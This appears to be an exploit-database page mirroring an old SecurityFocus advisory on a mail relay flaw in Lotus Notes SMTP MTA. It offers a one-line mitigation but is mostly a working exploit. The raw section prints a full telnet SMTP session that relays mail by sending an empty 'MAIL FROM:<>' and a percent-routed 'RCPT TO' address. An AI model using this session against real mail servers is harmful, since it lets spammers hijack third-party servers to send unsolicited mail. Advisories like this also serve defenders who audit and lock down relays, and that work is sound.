header-logo
Suggest Exploit
vendor:
Notes SMTP MTA
by:
SecurityFocus
3.3
CVSS
MEDIUM
Mail Relay Vulnerability
400
CWE
Product Name: Notes SMTP MTA
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2002

Lotus Notes SMTP MTA Mail Relay Vulnerability

Lotus Notes SMTP MTA is susceptible to being used as a mail relay for SPAM or other unsolicited email. Connecting to the mail server (tcp25) and issuing a 'mail from' command with <> as the data may allow an unauthorized user to relay email via this server.

Mitigation:

Ensure that the SMTP server is configured to only accept mail from authorized users.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/487/info

Lotus Notes SMTP MTA is susceptible to being used as a mail relay for SPAM or other unsolicited email. Connecting to the mail server (tcp25) and issuing a 'mail from' command with <> as the data may allow an unauthorized user to relay email via this server. 

telnet server 25
Connected to 192.168.1.1.
Escape character is '^]'.
220 company.com Lotus SMTP MTA Service Ready
HELO sample.domain
250 company.com
MAIL FROM:<>
250 OK
RCPT TO:<recipient%remote.domain.net@company.com>
250 OK
DATA
From: ... etc

text of message

.
250 Message received OK.
quit
221 GoodBye

Navigation

Suggest Exploit

Services By CQR